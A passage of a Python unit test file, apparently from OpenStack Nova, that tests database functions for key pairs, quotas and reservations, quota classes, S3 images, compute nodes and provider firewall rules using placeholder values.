db.fixed_ip_create(self.ctxt, {'network_id': net.id,
'reserved': True})
self.assertEqual(1, db.network_count_reserved_ips(self.ctxt, net.id))
class KeyPairTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(KeyPairTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _create_key_pair(self, values):
return db.key_pair_create(self.ctxt, values)
def test_key_pair_create(self):
param = {
'name': 'test_1',
'type': 'ssh',
'user_id': 'test_user_id_1',
'public_key': 'test_public_key_1',
'fingerprint': 'test_fingerprint_1'
}
key_pair = self._create_key_pair(param)
self.assertIsNotNone(key_pair['id'])
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(key_pair, param, ignored_keys)
def test_key_pair_create_with_duplicate_name(self):
params = {'name': 'test_name', 'user_id': 'test_user_id',
'type': 'ssh'}
self._create_key_pair(params)
self.assertRaises(exception.KeyPairExists, self._create_key_pair,
params)
def test_key_pair_get(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_2', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_3', 'type': 'ssh'}
]
key_pairs = [self._create_key_pair(p) for p in params]
for key in key_pairs:
real_key = db.key_pair_get(self.ctxt, key['user_id'], key['name'])
self._assertEqualObjects(key, real_key)
def test_key_pair_get_no_results(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1'}
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
def test_key_pair_get_deleted(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'}
key_pair_created = self._create_key_pair(param)
db.key_pair_destroy(self.ctxt, param['user_id'], param['name'])
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
ctxt = self.ctxt.elevated(read_deleted='yes')
key_pair_deleted = db.key_pair_get(ctxt, param['user_id'],
param['name'])
ignored_keys = ['deleted', 'created_at', 'updated_at', 'deleted_at']
self._assertEqualObjects(key_pair_deleted, key_pair_created,
ignored_keys)
self.assertEqual(key_pair_deleted['deleted'], key_pair_deleted['id'])
def test_key_pair_get_all_by_user(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_2', 'type': 'ssh'}
]
key_pairs_user_1 = [self._create_key_pair(p) for p in params
if p['user_id'] == 'test_user_id_1']
key_pairs_user_2 = [self._create_key_pair(p) for p in params
if p['user_id'] == 'test_user_id_2']
real_keys_1 = db.key_pair_get_all_by_user(self.ctxt, 'test_user_id_1')
real_keys_2 = db.key_pair_get_all_by_user(self.ctxt, 'test_user_id_2')
self._assertEqualListsOfObjects(key_pairs_user_1, real_keys_1)
self._assertEqualListsOfObjects(key_pairs_user_2, real_keys_2)
def test_key_pair_count_by_user(self):
params = [
{'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_2', 'user_id': 'test_user_id_1', 'type': 'ssh'},
{'name': 'test_3', 'user_id': 'test_user_id_2', 'type': 'ssh'}
]
for p in params:
self._create_key_pair(p)
count_1 = db.key_pair_count_by_user(self.ctxt, 'test_user_id_1')
self.assertEqual(count_1, 2)
count_2 = db.key_pair_count_by_user(self.ctxt, 'test_user_id_2')
self.assertEqual(count_2, 1)
def test_key_pair_destroy(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1', 'type': 'ssh'}
self._create_key_pair(param)
db.key_pair_destroy(self.ctxt, param['user_id'], param['name'])
self.assertRaises(exception.KeypairNotFound, db.key_pair_get,
self.ctxt, param['user_id'], param['name'])
def test_key_pair_destroy_no_such_key(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1'}
self.assertRaises(exception.KeypairNotFound,
db.key_pair_destroy, self.ctxt,
param['user_id'], param['name'])
class QuotaTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.quota_* methods."""
def setUp(self):
super(QuotaTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_quota_create(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
self.assertEqual(quota.resource, 'resource')
self.assertEqual(quota.hard_limit, 99)
self.assertEqual(quota.project_id, 'project1')
def test_quota_get(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
quota_db = db.quota_get(self.ctxt, 'project1', 'resource')
self._assertEqualObjects(quota, quota_db)
def test_quota_get_all_by_project(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'resource%d' % j, j)
for i in range(3):
quotas_db = db.quota_get_all_by_project(self.ctxt, 'proj%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'resource0': 0,
'resource1': 1,
'resource2': 2})
def test_quota_get_all_by_project_and_user(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'resource%d' % j,
j - 1, user_id='user%d' % i)
for i in range(3):
quotas_db = db.quota_get_all_by_project_and_user(self.ctxt,
'proj%d' % i,
'user%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'user_id': 'user%d' % i,
'resource0': -1,
'resource1': 0,
'resource2': 1})
def test_quota_update(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
db.quota_update(self.ctxt, 'project1', 'resource1', 42)
quota = db.quota_get(self.ctxt, 'project1', 'resource1')
self.assertEqual(quota.hard_limit, 42)
self.assertEqual(quota.resource, 'resource1')
self.assertEqual(quota.project_id, 'project1')
def test_quota_update_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_update, self.ctxt, 'project1', 'resource1', 42)
def test_quota_get_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_get, self.ctxt, 'project1', 'resource1')
def test_quota_reserve_all_resources(self):
quotas = {}
deltas = {}
reservable_resources = {}
for i, resource in enumerate(quota.resources):
if isinstance(resource, quota.ReservableResource):
quotas[resource.name] = db.quota_create(self.ctxt, 'project1',
resource.name,
100).hard_limit
deltas[resource.name] = i
reservable_resources[resource.name] = resource
usages = {'instances': 3, 'cores': 6, 'ram': 9}
instances = []
for i in range(3):
instances.append(db.instance_create(self.ctxt,
{'vcpus': 2, 'memory_mb': 3,
'project_id': 'project1'}))
usages['fixed_ips'] = 2
network = db.network_create_safe(self.ctxt, {})
for i in range(2):
address = '192.168.0.%d' % i
db.fixed_ip_create(self.ctxt, {'project_id': 'project1',
'address': address,
'network_id': network['id']})
db.fixed_ip_associate(self.ctxt, address,
instances[0].uuid, network['id'])
usages['floating_ips'] = 5
for i in range(5):
db.floating_ip_create(self.ctxt, {'project_id': 'project1'})
usages['security_groups'] = 3
for i in range(3):
db.security_group_create(self.ctxt, {'project_id': 'project1'})
usages['server_groups'] = 4
for i in range(4):
db.instance_group_create(self.ctxt, {'uuid': str(i),
'project_id': 'project1'})
reservations_uuids = db.quota_reserve(self.ctxt, reservable_resources,
quotas, quotas, deltas, None,
None, None, 'project1')
resources_names = list(reservable_resources.keys())
for reservation_uuid in reservations_uuids:
reservation = _reservation_get(self.ctxt, reservation_uuid)
usage = db.quota_usage_get(self.ctxt, 'project1',
reservation.resource)
self.assertEqual(usage.in_use, usages[reservation.resource],
'Resource: %s' % reservation.resource)
self.assertEqual(usage.reserved, deltas[reservation.resource])
self.assertIn(reservation.resource, resources_names)
resources_names.remove(reservation.resource)
self.assertEqual(len(resources_names), 0)
def test_quota_destroy_all_by_project(self):
reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
db.quota_destroy_all_by_project(self.ctxt, 'project1')
self.assertEqual(db.quota_get_all_by_project(self.ctxt, 'project1'),
{'project_id': 'project1'})
self.assertEqual(db.quota_get_all_by_project_and_user(self.ctxt,
'project1', 'user1'),
{'project_id': 'project1', 'user_id': 'user1'})
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, 'project1'),
{'project_id': 'project1'})
for r in reservations:
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, r)
def test_quota_destroy_all_by_project_and_user(self):
reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
db.quota_destroy_all_by_project_and_user(self.ctxt, 'project1',
'user1')
self.assertEqual(db.quota_get_all_by_project_and_user(self.ctxt,
'project1', 'user1'),
{'project_id': 'project1',
'user_id': 'user1'})
self.assertEqual(db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'),
{'project_id': 'project1',
'user_id': 'user1',
'fixed_ips': {'in_use': 2, 'reserved': 2}})
for r in reservations:
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, r)
def test_quota_usage_get_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound, db.quota_usage_get,
self.ctxt, 'p1', 'nonexitent_resource')
def test_quota_usage_get(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'resource0')
expected = {'resource': 'resource0', 'project_id': 'p1',
'in_use': 0, 'reserved': 0, 'total': 0}
for key, value in expected.items():
self.assertEqual(value, quota_usage[key])
def test_quota_usage_get_all_by_project(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
expected = {'project_id': 'p1',
'resource0': {'in_use': 0, 'reserved': 0},
'resource1': {'in_use': 1, 'reserved': 1},
'fixed_ips': {'in_use': 2, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project(
self.ctxt, 'p1'))
def test_quota_usage_get_all_by_project_and_user(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
expected = {'project_id': 'p1',
'user_id': 'u1',
'resource0': {'in_use': 0, 'reserved': 0},
'resource1': {'in_use': 1, 'reserved': 1},
'fixed_ips': {'in_use': 2, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'p1', 'u1'))
def test_quota_usage_update_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound, db.quota_usage_update,
self.ctxt, 'p1', 'u1', 'resource', in_use=42)
def test_quota_usage_update(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
db.quota_usage_update(self.ctxt, 'p1', 'u1', 'resource0', in_use=42,
reserved=43)
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'resource0', 'u1')
expected = {'resource': 'resource0', 'project_id': 'p1',
'user_id': 'u1', 'in_use': 42, 'reserved': 43, 'total': 85}
for key, value in expected.items():
self.assertEqual(value, quota_usage[key])
def test_quota_create_exists(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
self.assertRaises(exception.QuotaExists, db.quota_create, self.ctxt,
'project1', 'resource1', 42)
class QuotaReserveNoDbTestCase(test.NoDBTestCase):
"""Tests quota reserve/refresh operations using mock."""
def test_create_quota_usage_if_missing_not_created(self):
# Tests that QuotaUsage isn't created if it's already in user_usages.
resource = 'fake-resource'
project_id = 'fake-project'
user_id = 'fake_user'
session = mock.sentinel
quota_usage = mock.sentinel
user_usages = {resource: quota_usage}
with mock.patch.object(sqlalchemy_api, '_quota_usage_create') as quc:
self.assertFalse(sqlalchemy_api._create_quota_usage_if_missing(
user_usages, resource, None,
project_id, user_id, session))
self.assertFalse(quc.called)
def _test_create_quota_usage_if_missing_created(self, per_project_quotas):
# Tests that the QuotaUsage is created.
user_usages = {}
if per_project_quotas:
resource = sqlalchemy_api.PER_PROJECT_QUOTAS[0]
else:
resource = 'fake-resource'
project_id = 'fake-project'
user_id = 'fake_user'
session = mock.sentinel
quota_usage = mock.sentinel
with mock.patch.object(sqlalchemy_api, '_quota_usage_create',
return_value=quota_usage) as quc:
self.assertTrue(sqlalchemy_api._create_quota_usage_if_missing(
user_usages, resource, None,
project_id, user_id, session))
self.assertEqual(quota_usage, user_usages[resource])
# Now test if the QuotaUsage was created with a user_id or not.
if per_project_quotas:
quc.assert_called_once_with(
project_id, None, resource, 0, 0, None, session=session)
else:
quc.assert_called_once_with(
project_id, user_id, resource, 0, 0, None, session=session)
def test_create_quota_usage_if_missing_created_per_project_quotas(self):
self._test_create_quota_usage_if_missing_created(True)
def test_create_quota_usage_if_missing_created_user_quotas(self):
self._test_create_quota_usage_if_missing_created(False)
def test_is_quota_refresh_needed_in_use(self):
# Tests when a quota refresh is needed based on the in_use value.
for in_use in range(-1, 1):
# We have to set until_refresh=None otherwise mock will give it
# a value which runs some code we don't want.
quota_usage = mock.MagicMock(in_use=in_use, until_refresh=None)
if in_use < 0:
self.assertTrue(sqlalchemy_api._is_quota_refresh_needed(
quota_usage, max_age=0))
else:
self.assertFalse(sqlalchemy_api._is_quota_refresh_needed(
quota_usage, max_age=0))
def test_is_quota_refresh_needed_until_refresh_none(self):
quota_usage = mock.MagicMock(in_use=0, until_refresh=None)
self.assertFalse(sqlalchemy_api._is_quota_refresh_needed(quota_usage,
max_age=0))
def test_is_quota_refresh_needed_until_refresh_not_none(self):
# Tests different values for the until_refresh counter.
for until_refresh in range(3):
quota_usage = mock.MagicMock(in_use=0, until_refresh=until_refresh)
refresh = sqlalchemy_api._is_quota_refresh_needed(quota_usage,
max_age=0)
until_refresh -= 1
if until_refresh <= 0:
self.assertTrue(refresh)
else:
self.assertFalse(refresh)
self.assertEqual(until_refresh, quota_usage.until_refresh)
def test_refresh_quota_usages(self):
quota_usage = mock.Mock(spec=models.QuotaUsage)
quota_usage.in_use = 5
quota_usage.until_refresh = None
sqlalchemy_api._refresh_quota_usages(quota_usage, until_refresh=5,
in_use=6)
self.assertEqual(6, quota_usage.in_use)
self.assertEqual(5, quota_usage.until_refresh)
def test_calculate_overquota_no_delta(self):
deltas = {'foo': -1}
user_quotas = {'foo': 10}
overs = sqlalchemy_api._calculate_overquota({}, user_quotas, deltas,
{}, {})
self.assertFalse(overs)
def test_calculate_overquota_unlimited_quota(self):
deltas = {'foo': 1}
project_quotas = {}
user_quotas = {'foo': -1}
project_usages = {}
user_usages = {'foo': 10}
overs = sqlalchemy_api._calculate_overquota(
project_quotas, user_quotas, deltas, project_usages, user_usages)
self.assertFalse(overs)
def _test_calculate_overquota(self, resource, project_usages, user_usages):
deltas = {resource: 1}
project_quotas = {resource: 10}
user_quotas = {resource: 10}
overs = sqlalchemy_api._calculate_overquota(
project_quotas, user_quotas, deltas, project_usages, user_usages)
self.assertEqual(resource, overs[0])
def test_calculate_overquota_per_project_quota_overquota(self):
# In this test, user quotas are fine but project quotas are over.
resource = 'foo'
project_usages = {resource: {'total': 10}}
user_usages = {resource: {'total': 5}}
self._test_calculate_overquota(resource, project_usages, user_usages)
def test_calculate_overquota_per_user_quota_overquota(self):
# In this test, project quotas are fine but user quotas are over.
resource = 'foo'
project_usages = {resource: {'total': 5}}
user_usages = {resource: {'total': 10}}
self._test_calculate_overquota(resource, project_usages, user_usages)
class QuotaClassTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(QuotaClassTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_quota_class_get_default(self):
params = {
'test_resource1': '10',
'test_resource2': '20',
'test_resource3': '30',
}
for res, limit in params.items():
db.quota_class_create(self.ctxt, 'default', res, limit)
defaults = db.quota_class_get_default(self.ctxt)
self.assertEqual(defaults, dict(class_name='default',
test_resource1=10,
test_resource2=20,
test_resource3=30))
def test_quota_class_create(self):
qc = db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
self.assertEqual(qc.class_name, 'class name')
self.assertEqual(qc.resource, 'resource')
self.assertEqual(qc.hard_limit, 42)
def test_quota_class_get(self):
qc = db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
qc_db = db.quota_class_get(self.ctxt, 'class name', 'resource')
self._assertEqualObjects(qc, qc_db)
def test_quota_class_get_nonexistent(self):
self.assertRaises(exception.QuotaClassNotFound, db.quota_class_get,
self.ctxt, 'nonexistent', 'resource')
def test_quota_class_get_all_by_name(self):
for i in range(3):
for j in range(3):
db.quota_class_create(self.ctxt, 'class%d' % i,
'resource%d' % j, j)
for i in range(3):
classes = db.quota_class_get_all_by_name(self.ctxt, 'class%d' % i)
self.assertEqual(classes, {'class_name': 'class%d' % i,
'resource0': 0, 'resource1': 1, 'resource2': 2})
def test_quota_class_update(self):
db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
db.quota_class_update(self.ctxt, 'class name', 'resource', 43)
self.assertEqual(db.quota_class_get(self.ctxt, 'class name',
'resource').hard_limit, 43)
def test_quota_class_update_nonexistent(self):
self.assertRaises(exception.QuotaClassNotFound, db.quota_class_update,
self.ctxt, 'class name', 'resource', 42)
def test_refresh_quota_usages(self):
quota_usages = mock.Mock()
sqlalchemy_api._refresh_quota_usages(quota_usages, until_refresh=5,
in_use=6)
class S3ImageTestCase(test.TestCase):
def setUp(self):
super(S3ImageTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.values = [uuidutils.generate_uuid() for i in range(3)]
self.images = [db.s3_image_create(self.ctxt, uuid)
for uuid in self.values]
def test_s3_image_create(self):
for ref in self.images:
self.assertTrue(uuidutils.is_uuid_like(ref.uuid))
self.assertEqual(sorted(self.values),
sorted([ref.uuid for ref in self.images]))
def test_s3_image_get_by_uuid(self):
for uuid in self.values:
ref = db.s3_image_get_by_uuid(self.ctxt, uuid)
self.assertTrue(uuidutils.is_uuid_like(ref.uuid))
self.assertEqual(uuid, ref.uuid)
def test_s3_image_get(self):
self.assertEqual(sorted(self.values),
sorted([db.s3_image_get(self.ctxt, ref.id).uuid
for ref in self.images]))
def test_s3_image_get_not_found(self):
self.assertRaises(exception.ImageNotFound, db.s3_image_get, self.ctxt,
100500)
def test_s3_image_get_by_uuid_not_found(self):
self.assertRaises(exception.ImageNotFound, db.s3_image_get_by_uuid,
self.ctxt, uuidutils.generate_uuid())
class ComputeNodeTestCase(test.TestCase, ModelsObjectComparatorMixin):
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(ComputeNodeTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.service_dict = dict(host='host1', binary='nova-compute',
topic=CONF.compute_topic, report_count=1,
disabled=False)
self.service = db.service_create(self.ctxt, self.service_dict)
self.compute_node_dict = dict(vcpus=2, memory_mb=1024, local_gb=2048,
vcpus_used=0, memory_mb_used=0,
local_gb_used=0, free_ram_mb=1024,
free_disk_gb=2048, hypervisor_type="xen",
hypervisor_version=1, cpu_info="",
running_vms=0, current_workload=0,
service_id=self.service['id'],
host=self.service['host'],
disk_available_least=100,
hypervisor_hostname='abracadabra104',
host_ip='127.0.0.1',
supported_instances='',
pci_stats='',
metrics='',
extra_resources='',
stats='', numa_topology='')
# add some random stats
self.stats = dict(num_instances=3, num_proj_12345=2,
num_proj_23456=2, num_vm_building=3)
self.compute_node_dict['stats'] = jsonutils.dumps(self.stats)
self.flags(reserved_host_memory_mb=0)
self.flags(reserved_host_disk_mb=0)
self.item = db.compute_node_create(self.ctxt, self.compute_node_dict)
def test_compute_node_create(self):
self._assertEqualObjects(self.compute_node_dict, self.item,
ignored_keys=self._ignored_keys + ['stats'])
new_stats = jsonutils.loads(self.item['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_get_all(self):
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(1, len(nodes))
node = nodes[0]
self._assertEqualObjects(self.compute_node_dict, node,
ignored_keys=self._ignored_keys +
['stats', 'service'])
new_stats = jsonutils.loads(node['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_get_all_deleted_compute_node(self):
# Create a service and compute node and ensure we can find its stats;
# delete the service and compute node when done and loop again
for x in range(2, 5):
# Create a service
service_data = self.service_dict.copy()
service_data['host'] = 'host-%s' % x
service = db.service_create(self.ctxt, service_data)
# Create a compute node
compute_node_data = self.compute_node_dict.copy()
compute_node_data['service_id'] = service['id']
compute_node_data['stats'] = jsonutils.dumps(self.stats.copy())
compute_node_data['hypervisor_hostname'] = 'hypervisor-%s' % x
node = db.compute_node_create(self.ctxt, compute_node_data)
# Ensure the "new" compute node is found
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(2, len(nodes))
found = None
for n in nodes:
if n['id'] == node['id']:
found = n
break
self.assertIsNotNone(found)
# Now ensure the match has stats!
self.assertNotEqual(jsonutils.loads(found['stats']), {})
# Now delete the newly-created compute node to ensure the related
# compute node stats are wiped in a cascaded fashion
db.compute_node_delete(self.ctxt, node['id'])
# Clean up the service
db.service_destroy(self.ctxt, service['id'])
def test_compute_node_get_all_mult_compute_nodes_one_service_entry(self):
service_data = self.service_dict.copy()
service_data['host'] = 'host2'
service = db.service_create(self.ctxt, service_data)
existing_node = dict(self.item.iteritems())
expected = [existing_node]
for name in ['bm_node1', 'bm_node2']:
compute_node_data = self.compute_node_dict.copy()
compute_node_data['service_id'] = service['id']
compute_node_data['stats'] = jsonutils.dumps(self.stats)
compute_node_data['hypervisor_hostname'] = name
node = db.compute_node_create(self.ctxt, compute_node_data)
node = dict(node)
expected.append(node)
result = sorted(db.compute_node_get_all(self.ctxt),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_node_get_all_by_host_with_distinct_hosts(self):
# Create another service with another node
service2 = self.service_dict.copy()
service2['host'] = 'host2'
db.service_create(self.ctxt, service2)
compute_node_another_host = self.compute_node_dict.copy()
compute_node_another_host['stats'] = jsonutils.dumps(self.stats)
compute_node_another_host['hypervisor_hostname'] = 'node_2'
compute_node_another_host['host'] = 'host2'
node = db.compute_node_create(self.ctxt, compute_node_another_host)
result = db.compute_node_get_all_by_host(self.ctxt, 'host1', False)
self._assertEqualListsOfObjects([self.item], result)
result = db.compute_node_get_all_by_host(self.ctxt, 'host2', False)
self._assertEqualListsOfObjects([node], result)
def test_compute_node_get_all_by_host_with_same_host(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_3'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = [self.item, node]
result = sorted(db.compute_node_get_all_by_host(
self.ctxt, 'host1', False),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_node_get_all_by_host_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get_all_by_host, self.ctxt, 'wrong')
def test_compute_nodes_get_by_service_id_one_result(self):
expected = [self.item]
result = db.compute_nodes_get_by_service_id(
self.ctxt, self.service['id'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_nodes_get_by_service_id_multiple_results(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_2'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = [self.item, node]
result = sorted(db.compute_nodes_get_by_service_id(
self.ctxt, self.service['id']),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_nodes_get_by_service_id_not_found(self):
self.assertRaises(exception.ServiceNotFound,
db.compute_nodes_get_by_service_id, self.ctxt,
'fake')
def test_compute_node_get_by_host_and_nodename(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_2'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = node
result = db.compute_node_get_by_host_and_nodename(
self.ctxt, 'host1', 'node_2')
self._assertEqualObjects(expected, result)
def test_compute_node_get_by_host_and_nodename_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get_by_host_and_nodename,
self.ctxt, 'host1', 'wrong')
def test_compute_node_get(self):
compute_node_id = self.item['id']
node = db.compute_node_get(self.ctxt, compute_node_id)
self._assertEqualObjects(self.compute_node_dict, node,
ignored_keys=self._ignored_keys + ['stats', 'service'])
new_stats = jsonutils.loads(node['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_update(self):
compute_node_id = self.item['id']
stats = jsonutils.loads(self.item['stats'])
# change some values:
stats['num_instances'] = 8
stats['num_tribbles'] = 1
values = {
'vcpus': 4,
'stats': jsonutils.dumps(stats),
}
item_updated = db.compute_node_update(self.ctxt, compute_node_id,
values)
self.assertEqual(4, item_updated['vcpus'])
new_stats = jsonutils.loads(item_updated['stats'])
self.assertEqual(stats, new_stats)
def test_compute_node_delete(self):
compute_node_id = self.item['id']
db.compute_node_delete(self.ctxt, compute_node_id)
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(len(nodes), 0)
def test_compute_node_search_by_hypervisor(self):
nodes_created = []
new_service = copy.copy(self.service_dict)
for i in range(3):
new_service['binary'] += str(i)
new_service['topic'] += str(i)
service = db.service_create(self.ctxt, new_service)
self.compute_node_dict['service_id'] = service['id']
self.compute_node_dict['hypervisor_hostname'] = 'testhost' + str(i)
self.compute_node_dict['stats'] = jsonutils.dumps(self.stats)
node = db.compute_node_create(self.ctxt, self.compute_node_dict)
nodes_created.append(node)
nodes = db.compute_node_search_by_hypervisor(self.ctxt, 'host')
self.assertEqual(3, len(nodes))
self._assertEqualListsOfObjects(nodes_created, nodes,
ignored_keys=self._ignored_keys + ['stats', 'service'])
def test_compute_node_statistics(self):
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(stats.pop('count'), 1)
for k, v in stats.items():
self.assertEqual(v, self.item[k])
def test_compute_node_statistics_disabled_service(self):
serv = db.service_get_by_host_and_topic(
self.ctxt, 'host1', CONF.compute_topic)
db.service_update(self.ctxt, serv['id'], {'disabled': True})
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(stats.pop('count'), 0)
def test_compute_node_statistics_with_old_service_id(self):
# NOTE(sbauza): This test is only for checking backwards compatibility
# with old versions of compute_nodes not providing host column.
# This test could be removed once we are sure that all compute nodes
# are populating the host field thanks to the ResourceTracker
service2 = self.service_dict.copy()
service2['host'] = 'host2'
db_service2 = db.service_create(self.ctxt, service2)
compute_node_old_host = self.compute_node_dict.copy()
compute_node_old_host['stats'] = jsonutils.dumps(self.stats)
compute_node_old_host['hypervisor_hostname'] = 'node_2'
compute_node_old_host['service_id'] = db_service2['id']
compute_node_old_host.pop('host')
db.compute_node_create(self.ctxt, compute_node_old_host)
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(2, stats.pop('count'))
def test_compute_node_statistics_with_other_service(self):
other_service = self.service_dict.copy()
other_service['topic'] = 'fake-topic'
other_service['binary'] = 'nova-fake'
db.service_create(self.ctxt, other_service)
stats = db.compute_node_statistics(self.ctxt)
data = {'count': 1,
'vcpus_used': 0,
'local_gb_used': 0,
'memory_mb': 1024,
'current_workload': 0,
'vcpus': 2,
'running_vms': 0,
'free_disk_gb': 2048,
'disk_available_least': 100,
'local_gb': 2048,
'free_ram_mb': 1024,
'memory_mb_used': 0}
for key, value in six.iteritems(data):
self.assertEqual(value, stats.pop(key))
def test_compute_node_not_found(self):
self.assertRaises(exception.ComputeHostNotFound, db.compute_node_get,
self.ctxt, 100500)
def test_compute_node_update_always_updates_updated_at(self):
item_updated = db.compute_node_update(self.ctxt,
self.item['id'], {})
self.assertNotEqual(self.item['updated_at'],
item_updated['updated_at'])
def test_compute_node_update_override_updated_at(self):
# Update the record once so updated_at is set.
first = db.compute_node_update(self.ctxt, self.item['id'],
{'free_ram_mb': '12'})
self.assertIsNotNone(first['updated_at'])
# Update a second time. Make sure that the updated_at value we send
# is overridden.
second = db.compute_node_update(self.ctxt, self.item['id'],
{'updated_at': first.updated_at,
'free_ram_mb': '13'})
self.assertNotEqual(first['updated_at'], second['updated_at'])
def test_service_destroy_with_compute_node(self):
db.service_destroy(self.ctxt, self.service['id'])
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get, self.ctxt,
self.item['id'])
def test_service_destroy_with_old_compute_node(self):
# NOTE(sbauza): This test is only for checking backwards compatibility
# with old versions of compute_nodes not providing host column.
# This test could be removed once we are sure that all compute nodes
# are populating the host field thanks to the ResourceTracker
compute_node_old_host_dict = self.compute_node_dict.copy()
compute_node_old_host_dict.pop('host')
item_old = db.compute_node_create(self.ctxt,
compute_node_old_host_dict)
db.service_destroy(self.ctxt, self.service['id'])
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get, self.ctxt,
item_old['id'])
class ProviderFwRuleTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(ProviderFwRuleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.values = self._get_rule_values()
self.rules = [db.provider_fw_rule_create(self.ctxt, rule)
for rule in self.values]
def _get_rule_values(self):
cidr_samples = ['192.168.0.0/24', '10.1.2.3/32',
'2001:4f8:3:ba::/64',
'2001:4f8:3:ba:2e0:81ff:fe22:d1f1/128']
values = []
for i in range(len(cidr_samples)):
rule = {}
rule['protocol'] = 'foo' + str(i)
rule['from_port'] = 9999 + i
rule['to_port'] = 9898 + i
rule['cidr'] = cidr_samples[i]
values.append(rule)
return values
def test_provider_fw_rule_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for i, rule in enumerate(self.values):
self._assertEqualObjects(self.rules[i], rule,
ignored_keys=ignored_keys)
def test_provider_fw_rule_get_all(self):
self._assertEqualListsOfObjects(self.rules,
db.provider_fw_rule_get_all(self.ctxt))
def test_provider_fw_rule_destroy(self):
for rule in self.rules:
db.provider_fw_rule_destroy(self.ctxt, rule.id)
self.assertEqual([], db.provider_fw_rule_get_all(self.ctxt))
